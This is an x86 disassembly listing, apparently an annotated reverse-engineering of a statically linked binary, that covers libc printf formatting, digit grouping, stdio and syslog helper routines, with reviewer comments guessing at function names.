cmp [ebp+var_88], 0 jle short loc_805474F dec [ebp+var_A4] mov ecx, [ebp+var_A4] movzx ecx, byte ptr [ecx] cmp [ebp+var_34], ecx jz short loc_805474F nop loc_805471C: ; CODE XREF: sub_8053310+1427j mov eax, [ebp+var_A4] cmp byte ptr [eax], 39h jnz short loc_8054739 mov byte ptr [eax], 30h dec eax mov [ebp+var_A4], eax movzx edx, byte ptr [eax] cmp [ebp+var_34], edx jnz short loc_805471C loc_8054739: ; CODE XREF: sub_8053310+1415j mov ecx, [ebp+var_A4] movzx ecx, byte ptr [ecx] cmp [ebp+var_34], ecx jz short loc_805474F mov eax, [ebp+var_A4] inc byte ptr [eax] loc_805474F: ; CODE XREF: sub_8053310+13F5j ; sub_8053310+1409j ... cmp [ebp+var_88], 0 jz short loc_805476A mov edx, [ebp+var_A4] movzx edx, byte ptr [edx] cmp [ebp+var_34], edx jnz loc_8054914 loc_805476A: ; CODE XREF: sub_8053310+1446j mov ecx, [ebp+var_A4] movzx ecx, byte ptr [ecx-1] cmp [ebp+var_34], ecx jnz short loc_805477F dec [ebp+var_A4] loc_805477F: ; CODE XREF: sub_8053310+1467j dec [ebp+var_A4] cmp [ebp+var_A4], edi jb loc_805485C lea edx, [edi-1] mov eax, edx sub eax, [ebp+var_A4] mov esi, eax and esi, 3 cmp [ebp+var_A4], edx jle short loc_80547E5 test esi, esi jz short loc_8054800 cmp esi, 3 jge short loc_80547E5 cmp esi, 2 jge short loc_80547D0 mov eax, [ebp+var_A4] cmp byte ptr [eax], 39h jnz loc_8054846 mov byte ptr [eax], 30h dec eax mov [ebp+var_A4], eax loc_80547D0: ; CODE XREF: sub_8053310+14A5j mov edx, [ebp+var_A4] cmp byte ptr [edx], 39h jnz short loc_8054846 mov byte ptr [edx], 30h dec edx mov [ebp+var_A4], edx loc_80547E5: ; CODE XREF: sub_8053310+1497j ; sub_8053310+14A0j mov ecx, [ebp+var_A4] cmp byte ptr [ecx], 39h jnz short loc_8054846 mov byte ptr [ecx], 30h dec ecx mov [ebp+var_A4], ecx cmp ecx, edi jb short loc_805485C lea esi, [esi] loc_8054800: ; CODE XREF: sub_8053310+149Bj ; sub_8053310+1534j mov eax, [ebp+var_A4] cmp byte ptr [eax], 39h jnz short loc_8054846 mov byte ptr [eax], 30h dec eax mov [ebp+var_A4], eax cmp byte ptr [eax], 39h jnz short loc_8054846 mov byte ptr 
[eax], 30h dec eax mov [ebp+var_A4], eax cmp byte ptr [eax], 39h jnz short loc_8054846 mov byte ptr [eax], 30h dec eax mov [ebp+var_A4], eax cmp byte ptr [eax], 39h jnz short loc_8054846 mov byte ptr [eax], 30h dec eax mov [ebp+var_A4], eax cmp eax, edi jnb short loc_8054800 loc_8054846: ; CODE XREF: sub_8053310+14B0j ; sub_8053310+14C9j ... cmp [ebp+var_A4], edi jb short loc_805485C mov edx, [ebp+var_A4] inc byte ptr [edx] jmp loc_8054914 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_805485C: ; CODE XREF: sub_8053310+147Bj ; sub_8053310+14ECj ... cmp [ebp+var_14], 66h jz short loc_8054880 mov byte ptr [edi], 31h cmp [ebp+var_10], 0 jnz short loc_8054874 mov esi, [ebp+var_18] inc esi jmp short loc_8054878 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8054874: ; CODE XREF: sub_8053310+1559j mov esi, [ebp+var_18] dec esi loc_8054878: ; CODE XREF: sub_8053310+155Fj mov [ebp+var_18], esi jmp short loc_80548F3 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8054880: ; CODE XREF: sub_8053310+1550j mov ecx, [ebp+var_8C] cmp [ebp+var_80], ecx jnz short loc_80548EC dec edi mov al, byte ptr [ebp+var_34] mov [edi], al dec edi mov byte ptr [edi], 31h mov edx, [ebp+arg_4] cmp dword ptr [edx+18h], 0 jnz short loc_80548A7 cmp [ebp+var_88], 0 jle short loc_80548B5 loc_80548A7: ; CODE XREF: sub_8053310+158Cj mov ecx, [ebp+var_80] mov byte ptr [edi+ecx+2], 30h inc [ebp+var_88] loc_80548B5: ; CODE XREF: sub_8053310+1595j mov eax, [ebp+var_80] add [ebp+var_88], eax mov [ebp+var_80], 1 inc [ebp+var_18] mov edx, [ebp+arg_4] movzx edx, byte ptr [edx+8] mov esi, 65h mov ecx, dword_8078FA0 test byte ptr [ecx+edx*2+1], 1 jz short loc_80548E6 mov esi, 45h loc_80548E6: ; CODE XREF: sub_8053310+15CFj mov [ebp+var_14], esi jmp short loc_80548F3 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_80548EC: ; CODE XREF: sub_8053310+1579j dec edi mov byte ptr [edi], 31h inc [ebp+var_80] 
loc_80548F3: ; CODE XREF: sub_8053310+156Bj ; sub_8053310+15D9j mov esi, [ebp+var_80] add esi, [ebp+var_88] cmp [ebp+var_8C], esi jge short loc_8054914 mov eax, esi sub eax, [ebp+var_8C] sub ebx, eax sub [ebp+var_88], eax loc_8054914: ; CODE XREF: sub_8053310+13C5j ; sub_8053310+13E8j ... mov eax, [ebp+var_84] cmp [ebp+var_88], eax jle short loc_805493F lea esi, [esi] loc_8054924: ; CODE XREF: sub_8053310+162Dj cmp byte ptr [ebx-1], 30h jnz short loc_805493F dec ebx dec [ebp+var_88] mov edx, [ebp+var_84] cmp [ebp+var_88], edx jg short loc_8054924 loc_805493F: ; CODE XREF: sub_8053310+1610j ; sub_8053310+1618j cmp [ebp+var_88], 0 jnz short loc_805495B mov ecx, [ebp+arg_4] cmp dword ptr [ecx+18h], 0 jnz short loc_805495B movzx eax, byte ptr [ebx-1] cmp [ebp+var_34], eax jnz short loc_805495B dec ebx loc_805495B: ; CODE XREF: sub_8053310+1636j ; sub_8053310+163Fj ... cmp [ebp+var_50], 0 jz short loc_8054979 mov eax, [ebp+var_38] push eax mov edx, [ebp+var_50] push edx mov ecx, [ebp+var_80] push ecx push ebx push edi call sub_8054C7C mov ebx, eax add esp, 14h loc_8054979: ; CODE XREF: sub_8053310+164Fj cmp [ebp+var_14], 66h jz loc_8054A32 mov al, byte ptr [ebp+var_14] mov [ebx], al inc ebx mov esi, ebx inc ebx mov byte ptr [ebp+var_A4], 2Bh cmp [ebp+var_10], 0 jz short loc_80549A0 mov byte ptr [ebp+var_A4], 2Dh loc_80549A0: ; CODE XREF: sub_8053310+1687j mov al, byte ptr [ebp+var_A4] mov [esi], al mov [ebp+var_A0], 0Ah mov edx, [ebp+var_A0] cmp [ebp+var_18], edx jl short loc_80549DA db 8Dh,76h,0 ; lea esi, [esi+0] loc_80549C0: ; CODE XREF: sub_8053310+16C8j mov ecx, [ebp+var_A0] lea ecx, [ecx+ecx*8] add [ebp+var_A0], ecx mov eax, [ebp+var_A0] cmp [ebp+var_18], eax jge short loc_80549C0 loc_80549DA: ; CODE XREF: sub_8053310+16ABj cmp [ebp+var_18], 9 jg short loc_80549E8 mov byte ptr [ebx], 30h inc ebx jmp short loc_8054A29 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80549E8: ; CODE XREF: sub_8053310+16CEj ; 
sub_8053310+1717j mov eax, [ebp+var_A0] mov ecx, 0Ah cdq idiv ecx mov [ebp+var_A0], eax mov esi, [ebp+var_18] mov eax, esi cdq idiv [ebp+var_A0] mov esi, eax add al, 30h mov [ebx], al inc ebx mov esi, [ebp+var_18] mov eax, esi cdq idiv [ebp+var_A0] mov esi, edx mov [ebp+var_18], esi cmp [ebp+var_A0], 0Ah jg short loc_80549E8 loc_8054A29: ; CODE XREF: sub_8053310+16D4j mov cl, byte ptr [ebp+var_18] add cl, 30h mov [ebx], cl inc ebx loc_8054A32: ; CODE XREF: sub_8053310+166Dj cmp [ebp+var_3C], 0 jnz short loc_8054A47 mov eax, [ebp+arg_4] cmp dword ptr [eax+24h], 0 jnz short loc_8054A47 cmp dword ptr [eax+1Ch], 0 jz short loc_8054A4A loc_8054A47: ; CODE XREF: sub_8053310+1726j ; sub_8053310+172Fj dec [ebp+var_78] loc_8054A4A: ; CODE XREF: sub_8053310+1735j mov edx, ebx sub edx, edi sub [ebp+var_78], edx mov ecx, [ebp+arg_4] cmp dword ptr [ecx+20h], 0 jnz short loc_8054A8C cmp byte ptr [ecx+2Ch], 30h jz short loc_8054A8C cmp [ebp+var_78], 0 jle short loc_8054A8C mov eax, [ebp+var_78] push eax movzx edx, byte ptr [ecx+2Ch] push edx mov ecx, [ebp+arg_0] push ecx call sub_8062534 mov esi, eax add esp, 0Ch cmp [ebp+var_78], esi jnz loc_8054BD6 mov eax, [ebp+var_78] add [ebp+var_5C], eax loc_8054A8C: ; CODE XREF: sub_8053310+1748j ; sub_8053310+174Ej ... 
cmp [ebp+var_3C], 0 jz short loc_8054ACC mov edx, [ebp+arg_0] mov edx, [edx+14h] mov ecx, [ebp+arg_0] cmp [ecx+18h], edx ja short loc_8054AB8 push 2Dh push ecx loc_8054AA3: ; CODE XREF: sub_8053310+17D6j ; sub_8053310+1806j call sub_8061910 mov esi, eax add esp, 8 cmp esi, 0FFFFFFFFh jz loc_8054BD6 jmp short loc_8054B27 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8054AB8: ; CODE XREF: sub_8053310+178Ej mov eax, [ebp+arg_0] mov eax, [eax+14h] mov byte ptr [eax], 2Dh mov edx, [ebp+arg_0] inc dword ptr [edx+14h] jmp short loc_8054B27 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8054ACC: ; CODE XREF: sub_8053310+1780j mov ecx, [ebp+arg_4] cmp dword ptr [ecx+24h], 0 jz short loc_8054AFC mov eax, [ebp+arg_0] mov eax, [eax+14h] mov edx, [ebp+arg_0] cmp [edx+18h], eax ja short loc_8054AE8 push 2Bh push edx jmp short loc_8054AA3 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8054AE8: ; CODE XREF: sub_8053310+17D1j mov ecx, [ebp+arg_0] mov ecx, [ecx+14h] mov byte ptr [ecx], 2Bh mov eax, [ebp+arg_0] inc dword ptr [eax+14h] jmp short loc_8054B27 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8054AFC: ; CODE XREF: sub_8053310+17C3j mov edx, [ebp+arg_4] cmp dword ptr [edx+1Ch], 0 jz short loc_8054B2A mov ecx, [ebp+arg_0] mov ecx, [ecx+14h] mov eax, [ebp+arg_0] cmp [eax+18h], ecx ja short loc_8054B18 push 20h push eax jmp short loc_8054AA3 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8054B18: ; CODE XREF: sub_8053310+1801j mov edx, [ebp+arg_0] mov edx, [edx+14h] mov byte ptr [edx], 20h mov ecx, [ebp+arg_0] inc dword ptr [ecx+14h] loc_8054B27: ; CODE XREF: sub_8053310+17A6j ; sub_8053310+17B7j ... 
inc [ebp+var_5C] loc_8054B2A: ; CODE XREF: sub_8053310+17F3j mov eax, [ebp+arg_4] cmp dword ptr [eax+20h], 0 jnz short loc_8054B5E cmp byte ptr [eax+2Ch], 30h jnz short loc_8054B5E cmp [ebp+var_78], 0 jle short loc_8054B5E mov edx, [ebp+var_78] push edx push 30h mov ecx, [ebp+arg_0] push ecx call sub_8062534 mov esi, eax add esp, 0Ch cmp [ebp+var_78], esi jnz short loc_8054BD6 mov eax, [ebp+var_78] add [ebp+var_5C], eax loc_8054B5E: ; CODE XREF: sub_8053310+1821j ; sub_8053310+1827j ... sub ebx, edi cmp ebx, 14h jle short loc_8054BE3 mov edx, [ebp+arg_0] mov edx, [edx+50h] push ebx push edi mov ecx, [ebp+arg_0] push ecx mov eax, [edx+34h] call eax mov esi, eax add esp, 0Ch cmp esi, ebx jnz short loc_8054BD6 add [ebp+var_5C], ebx jmp short loc_8054BEA ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8054B84: ; CODE XREF: sub_8053310+18D8j movzx esi, byte ptr [edi] inc edi mov edx, [ebp+arg_0] mov edx, [edx+14h] mov ecx, [ebp+arg_0] cmp [ecx+18h], edx ja short loc_8054BB4 mov eax, esi movzx esi, al mov [ebp+var_9C], esi push esi push ecx call sub_8061910 mov esi, eax add esp, 8 cmp esi, 0FFFFFFFFh jz short loc_8054BD6 jmp short loc_8054BE0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8054BB4: ; CODE XREF: sub_8053310+1884j mov edx, [ebp+arg_0] mov edx, [edx+14h] mov ecx, esi mov byte ptr [ebp+var_A0], cl mov [edx], cl movzx eax, byte ptr [ebp+var_A0] mov edx, [ebp+arg_0] inc dword ptr [edx+14h] cmp eax, 0FFFFFFFFh jnz short loc_8054BE0 loc_8054BD6: ; CODE XREF: sub_8053310+266j ; sub_8053310+293j ... 
mov eax, 0FFFFFFFFh jmp short loc_8054C1B ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8054BE0: ; CODE XREF: sub_8053310+18A2j ; sub_8053310+18C4j inc [ebp+var_5C] loc_8054BE3: ; CODE XREF: sub_8053310+1853j mov eax, ebx dec ebx test eax, eax jnz short loc_8054B84 loc_8054BEA: ; CODE XREF: sub_8053310+1872j mov ecx, [ebp+arg_4] cmp dword ptr [ecx+20h], 0 jz short loc_8054C18 cmp [ebp+var_78], 0 jle short loc_8054C18 mov eax, [ebp+var_78] push eax movzx edx, byte ptr [ecx+2Ch] push edx mov ecx, [ebp+arg_0] push ecx call sub_8062534 mov ebx, eax cmp [ebp+var_78], ebx jnz short loc_8054BD6 mov eax, [ebp+var_78] add [ebp+var_5C], eax loc_8054C18: ; CODE XREF: sub_8053310+387j ; sub_8053310+38Fj ... mov eax, [ebp+var_5C] loc_8054C1B: ; CODE XREF: sub_8053310+18CBj lea esp, [ebp+var_164] pop ebx pop esi pop edi mov esp, ebp pop ebp retn sub_8053310 endp ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden sub_8054C28 proc near ; CODE XREF: sub_8053310+1252p ; sub_8054C7C+15p var_C = byte ptr -0Ch var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 4 push esi push ebx mov ecx, [ebp+arg_0] mov edx, [ebp+arg_4] cmp byte ptr [edx], 0FFh jz short loc_8054C40 cmp byte ptr [edx], 0 jnz short loc_8054C58 loc_8054C40: ; CODE XREF: sub_8054C28+11j xor eax, eax jmp short loc_8054C73 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8054C44: ; CODE XREF: sub_8054C28+40j movzx edx, byte ptr [edx-1] mov [ebp+var_4], edx mov eax, ecx xor edx, edx div [ebp+var_4] mov ecx, eax add ebx, ecx jmp short loc_8054C71 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8054C58: ; CODE XREF: sub_8054C28+16j xor ebx, ebx jmp short loc_8054C6A ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8054C5C: ; CODE XREF: sub_8054C28+47j inc ebx sub ecx, esi inc edx cmp byte ptr [edx], 0FFh jz short loc_8054C71 cmp byte ptr [edx], 0 jz short loc_8054C44 loc_8054C6A: ; CODE XREF: sub_8054C28+32j 
; Tail of sub_8054C28: its proc line, entry checks and the loc_8054C6A label
; precede this span. Loop test: branch back to loc_8054C5C while ecx is above
; the byte read from [edx]; otherwise return the count held in ebx.
                movzx esi, byte ptr [edx]
                cmp ecx, esi
                ja short loc_8054C5C

loc_8054C71:                            ; CODE XREF: sub_8054C28+2Ej
                                        ; sub_8054C28+3Bj
                mov eax, ebx

loc_8054C73:                            ; CODE XREF: sub_8054C28+1Aj
                lea esp, [ebp+var_C]
                pop ebx
                pop esi
                mov esp, ebp
                pop ebp
                retn
sub_8054C28 endp

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; sub_8054C7C(arg_0, arg_4, arg_8, arg_C, arg_10)
;   Calls sub_8054C28(arg_8, arg_C, arg_10) and keeps the result in var_4.
;   If that result is 0, returns arg_4 unchanged. Otherwise it calls
;   sub_8056570(arg_0+arg_8+var_4, arg_0+arg_8, arg_4-(arg_0+arg_8)) and then
;   walks backwards, copying bytes from arg_0[esi] to [edx] in runs whose
;   lengths are read from the byte string at arg_C, storing the low byte of
;   arg_10 between runs. Returns arg_4 + var_4.
;   NOTE(review): the shape matches printf-style digit grouping (separator
;   insertion) in a statically linked libc; the only caller listed is
;   sub_8053310. Confirm before renaming.
sub_8054C7C proc near                   ; CODE XREF: sub_8053310+165Fp
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
                push ebp
                mov ebp, esp
                sub esp, 4
                push edi
                push esi
                push ebx
                mov esi, [ebp+arg_8]
                mov edi, [ebp+arg_C]
                mov ebx, [ebp+arg_10]
                push ebx
                push edi
                push esi
                call sub_8054C28
                mov [ebp+var_4], eax
                add esp, 0Ch
                test eax, eax
                jnz short loc_8054CA8
                ; nothing to insert: return arg_4 as-is
                mov eax, [ebp+arg_4]
                jmp loc_8054DAD
; ---------------------------------------------------------------------------

loc_8054CA8:                            ; CODE XREF: sub_8054C7C+22j
                mov ebx, [ebp+arg_0]
                add ebx, esi
                mov eax, [ebp+arg_4]
                sub eax, ebx
                push eax
                push ebx
                add ebx, [ebp+var_4]
                push ebx
                ; presumably a memmove-style (dst, src, n) helper - TODO confirm
                call sub_8056570
                ; edx = write cursor, one byte below the shifted position
                lea edx, [ebx-1]

loc_8054CC0:                            ; CODE XREF: sub_8054C7C+C2j
                ; ecx = next run length from arg_C; eax = (-ecx) & 3 selects the
                ; entry point into the 4-way unrolled copy below
                movzx ecx, byte ptr [edi]
                inc edi
                mov eax, ecx
                neg eax
                and eax, 3
                test ecx, ecx
                jle short loc_8054CF3
                test eax, eax
                jz short loc_8054D00
                cmp eax, 3
                jge short loc_8054CF3
                cmp eax, 2
                jge short loc_8054CE8
                dec esi
                mov ebx, [ebp+arg_0]
                mov al, [esi+ebx]
                mov [edx], al
                dec edx
                dec ecx

loc_8054CE8:                            ; CODE XREF: sub_8054C7C+5Fj
                dec esi
                mov ebx, [ebp+arg_0]
                mov al, [esi+ebx]
                mov [edx], al
                dec edx
                dec ecx

loc_8054CF3:                            ; CODE XREF: sub_8054C7C+51j
                                        ; sub_8054C7C+5Aj
                dec esi
                mov ebx, [ebp+arg_0]
                mov al, [esi+ebx]
                mov [edx], al
                dec edx
                dec ecx
                jz short loc_8054D28

loc_8054D00:                            ; CODE XREF: sub_8054C7C+55j
                                        ; sub_8054C7C+AAj
                ; unrolled: four bytes per iteration, moving downwards
                mov ebx, [ebp+arg_0]
                mov al, [ebx+esi-1]
                mov [edx], al
                mov al, [ebx+esi-2]
                mov [edx-1], al
                mov al, [ebx+esi-3]
                mov [edx-2], al
                add esi, 0FFFFFFFCh
                mov al, [esi+ebx]
                mov [edx-3], al
                add edx, 0FFFFFFFCh
                add ecx, 0FFFFFFFCh
                jnz short loc_8054D00

loc_8054D28:                            ; CODE XREF: sub_8054C7C+82j
                ; store the separator byte (low byte of arg_10) after the run
                mov al, byte ptr [ebp+arg_10]
                mov [edx], al
                dec edx
                ; a 0FFh entry ends the grouping; a 0 entry steps edi back so the
                ; previous run length is read again
                cmp byte ptr [edi], 0FFh
                jz short loc_8054D40
                cmp byte ptr [edi], 0
                jnz short loc_8054D39
                dec edi

loc_8054D39:                            ; CODE XREF: sub_8054C7C+BAj
                movzx eax, byte ptr [edi]
                cmp esi, eax
                ja short loc_8054CC0

loc_8054D40:                            ; CODE XREF: sub_8054C7C+B5j
                ; copy whatever is left, again via a 4-way unrolled loop,
                ; until edx reaches arg_0
                mov eax, [ebp+arg_0]
                sub eax, edx
                and eax, 3
                cmp [ebp+arg_0], edx
                jge short loc_8054D6F
                test eax, eax
                jz short loc_8054D80
                cmp eax, 3
                jge short loc_8054D6F
                cmp eax, 2
                jge short loc_8054D65
                dec esi
                mov ebx, [ebp+arg_0]
                mov al, [esi+ebx]
                mov [edx], al
                dec edx

loc_8054D65:                            ; CODE XREF: sub_8054C7C+DDj
                dec esi
                mov ebx, [ebp+arg_0]
                mov al, [esi+ebx]
                mov [edx], al
                dec edx

loc_8054D6F:                            ; CODE XREF: sub_8054C7C+CFj
                                        ; sub_8054C7C+D8j
                dec esi
                mov ebx, [ebp+arg_0]
                mov al, [esi+ebx]
                mov [edx], al
                dec edx
                cmp edx, ebx
                jbe short loc_8054DA7
                db 8Dh,76h,0 ; lea esi, [esi+0]

loc_8054D80:                            ; CODE XREF: sub_8054C7C+D3j
                                        ; sub_8054C7C+129j
                mov ebx, [ebp+arg_0]
                mov al, [ebx+esi-1]
                mov [edx], al
                mov al, [ebx+esi-2]
                mov [edx-1], al
                mov al, [ebx+esi-3]
                mov [edx-2], al
                add esi, 0FFFFFFFCh
                mov al, [esi+ebx]
                mov [edx-3], al
                add edx, 0FFFFFFFCh
                cmp edx, ebx
                ja short loc_8054D80

loc_8054DA7:                            ; CODE XREF: sub_8054C7C+FFj
                ; return arg_4 advanced by the number of inserted bytes
                mov eax, [ebp+arg_4]
                add eax, [ebp+var_4]

loc_8054DAD:                            ; CODE XREF: sub_8054C7C+27j
                lea esp, [ebp+var_10]
                pop ebx
                pop esi
                pop edi
                mov esp, ebp
                pop ebp
                retn
sub_8054C7C endp

; ---------------------------------------------------------------------------
                align 4

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; sub_8054DB8(arg_0)
;   If arg_0 is NULL, or the upper 16 bits of the dword at [arg_0] are not
;   0FBADh, stores 16h in __errno and returns without loading a return value.
;   Otherwise returns the result of sub_806267C(arg_0, 0, 0, 3).
;   NOTE(review): 0FBAD0000h is the magic tag GNU libio keeps in a FILE's
;   flags word, so arg_0 is presumably a FILE *; 16h would be EINVAL in Linux
;   numbering. Library code, not sample logic - confirm.
sub_8054DB8 proc near                   ; CODE XREF: sub_804C538+2Ap
arg_0 = dword ptr 8
                push ebp
                mov ebp, esp
                mov edx, [ebp+arg_0]
                test edx, edx
                jnz short loc_8054DD0

loc_8054DC2:                            ; CODE XREF: sub_8054DB8+24j
                mov __errno, 16h
                mov esp, ebp
                pop ebp
                retn
; ---------------------------------------------------------------------------

loc_8054DD0:                            ; CODE XREF: sub_8054DB8+8j
                ; validate the magic in the top half of the first dword
                mov eax, [edx]
                and eax, 0FFFF0000h
                cmp eax, 0FBAD0000h
                jnz short loc_8054DC2
                push 3
                push 0
                push 0
                push edx
                call sub_806267C
                mov esp, ebp
                pop ebp
                retn
sub_8054DB8 endp
;
; ---------------------------------------------------------------------------
                db 2 dup(90h)

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; sub_8054DF0(arg_0, arg_4)
;   Thin wrapper: returns sub_80626C8(arg_0, arg_4, 400h).
;   NOTE(review): a two-argument wrapper adding a fixed 400h size looks like a
;   stdio setbuf-style helper from the statically linked libc - confirm.
sub_8054DF0 proc near                   ; CODE XREF: sub_804E490+49p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
                push ebp
                mov ebp, esp
                mov edx, [ebp+arg_0]
                mov eax, [ebp+arg_4]
                push 400h
                push eax
                push edx
                call sub_80626C8
                mov esp, ebp
                pop ebp
                retn
sub_8054DF0 endp

; ---------------------------------------------------------------------------
                db 3 dup(90h)

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; sub_8054E0C(arg_0, arg_4, arg_8)
;   Registers a pair of values in two 256-entry dword tables indexed by arg_0:
;   dword_807A858[arg_0] = arg_4 and dword_807E78C[arg_0] = arg_8, and points
;   dword_807888C at dword_807A858. Returns 0. An index above 0FFh is rejected
;   with __errno = 16h and a return value of -1.
;   The proc line carries no cross-reference, so no caller was identified in
;   this listing.
;   NOTE(review): presumably a printf-specifier registration routine from
;   libc; 16h would be EINVAL in Linux numbering - confirm.
sub_8054E0C proc near
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
                push ebp
                mov ebp, esp
                mov eax, [ebp+arg_0]
                mov ecx, [ebp+arg_4]
                mov edx, [ebp+arg_8]
                ; unsigned bound check keeps the index inside 0..0FFh
                cmp eax, 0FFh
                ja short loc_8054E40
                mov dword_807888C, offset dword_807A858
                mov ds:dword_807E78C[eax*4], edx
                mov ds:dword_807A858[eax*4], ecx
                xor eax, eax
                mov esp, ebp
                pop ebp
                retn
; ---------------------------------------------------------------------------
                db 8Dh, 76h, 0
; ---------------------------------------------------------------------------

loc_8054E40:                            ; CODE XREF: sub_8054E0C+11j
                mov __errno, 16h
                mov eax, 0FFFFFFFFh
                mov esp, ebp
                pop ebp
                retn
sub_8054E0C endp

; ---------------------------------------------------------------------------
                align 4

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; sub_8054E54(arg_0)
;   Closes the descriptor stored in dword_8078894, marks it as -1 and clears
;   dword_807AC58. When arg_0 is non-zero it also resets the logging state to
;   defaults: dword_8078898 = 0, dword_807889C = "syslog", dword_80788A0 = 8,
;   dword_80788A4 = 0FFh.
;   NOTE(review): together with the "/dev/log" user of the same globals in
;   sub_80552B0 this looks like libc's internal closelog; the globals would
;   then be log fd / connected flag / options / ident / facility / mask.
;   Treat those names as working labels until confirmed.
sub_8054E54 proc near                   ; CODE XREF: sub_8054EC8+366p
                                        ; sub_8055374+5p
var_4 = dword ptr -4
arg_0 = dword ptr 8
                push ebp
                mov ebp, esp
                push ebx
                mov ebx, [ebp+arg_0]
                mov eax, dword_8078894
                push eax
                ; the result of close is not checked
                call close
                mov dword_8078894, 0FFFFFFFFh
                mov ds:dword_807AC58, 0
                test ebx, ebx
                jz short loc_8054EA6
                mov dword_8078898, 0
                mov dword_807889C, offset aSyslog ; "syslog"
                mov dword_80788A0, 8
                mov dword_80788A4, 0FFh

loc_8054EA6:                            ; CODE XREF: sub_8054E54+28j
                mov ebx, [ebp+var_4]
                mov esp, ebp
                pop ebp
                retn
sub_8054E54 endp

; ---------------------------------------------------------------------------
                db 8Dh, 76h, 0

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
sub_8054EB0 proc near                   ; CODE XREF: getanswer+280p
                                        ; getanswer+3CEp ...
; Body of sub_8054EB0 (its proc line immediately precedes this span).
; Variadic front end: forwards arg_0, arg_4 and the ADDRESS of the first
; variadic slot (arg_8) to sub_8054EC8, i.e. a syslog()-to-vsyslog() style
; hand-off.
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
                push ebp
                mov ebp, esp
                mov ecx, [ebp+arg_0]
                mov edx, [ebp+arg_4]
                lea eax, [ebp+arg_8]
                push eax
                push edx
                push ecx
                call sub_8054EC8
                mov esp, ebp
                pop ebp
                retn
sub_8054EB0 endp

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; sub_8054EC8(arg_0 = priority, arg_4 = format, arg_8 = argument list)
;   Builds one log record on the stack and writes it to the descriptor in
;   dword_8078894, optionally echoing it to fd 2 and to /dev/console.
